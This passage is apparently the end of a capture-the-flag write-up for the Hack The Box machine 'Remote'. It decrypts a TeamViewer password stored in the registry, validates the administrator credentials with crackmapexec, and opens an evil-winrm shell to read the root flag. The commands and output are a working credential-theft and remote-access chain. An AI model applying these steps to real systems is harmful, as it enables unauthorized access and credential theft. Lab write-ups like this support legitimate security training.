8AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F LastMACUsed REG_MULTI_SZ \0005056B9E820 MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0} MIDVersion REG_DWORD 0x1 ClientID REG_DWORD 0x6972e4aa CUse REG_DWORD 0x1 LastUpdateCheck REG_DWORD 0x5e72893c UsageEnvironmentBackup REG_DWORD 0x1 SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B MultiPwdMgmtIDs REG_MULTI_SZ admin MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77 Security_PasswordStrength REG_DWORD 0x3
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\AccessControl HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\DefaultSettings
Using the
u505@naos:~/HTB/Machines/Remote$ python3 /opt/utils/teamviewer_password_decrypt/teamviewer_password_decrypt.py
This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity. Read this blogpost if you haven't already : https://whynotsecurity.com/blog/teamviewer
Please check below mentioned registry values and enter its value manually without spaces. "SecurityPasswordAES" OR "OptionsPasswordAES" OR "SecurityPasswordExported" OR "PermanentPassword"
Enter output from registry without spaces : FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B Decrypted password is : !R3m0te!
Check credentials
u505@naos:~/HTB/Machines/Remote$ crackmapexec smb 10.10.10.180/32 -u administrator -p '!R3m0te!'
SMB 10.10.10.180 445 REMOTE [*] Windows 10.0 Build 17763 x64 (name:REMOTE) (domain:remote) (signing:False) (SMBv1:False)
SMB 10.10.10.180 445 REMOTE [+] remote\administrator:!R3m0te! (Pwn3d!)
Root flag
With administrator, we can use psexec or evil-winrm to gain a shell.
u505@naos:~/HTB/Machines/Remote$ evil-winrm -i 10.10.10.180 -u administrator -p '!R3m0te!' Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/19/2020 4:26 PM SQL Server Management Studio d----- 2/20/2020 12:05 AM Visual Studio 2017
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd .. *Evil-WinRM* PS C:\Users\Administrator> cd Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/30/2020 4:55 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt <ROOT_FLAG> *Evil-WinRM* PS C:\Users\Administrator\Desktop> exit
Info: Exiting with code 0
References
- Where does Umbraco store usernames and passwords?
- https://fileinfo.com/extension/sdf
- Umbraco RCE exploit / PoC
- Umbraco RCE PowerShell Reverse Shell PoC
- https://whynotsecurity.com/blog/teamviewer/
- This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity
- https://community.teamviewer.com/English/kb/articles/16835-how-to-uninstall-teamviewer-on-pc
Daniel Simao 08:14, 31 December 2020 (EST)
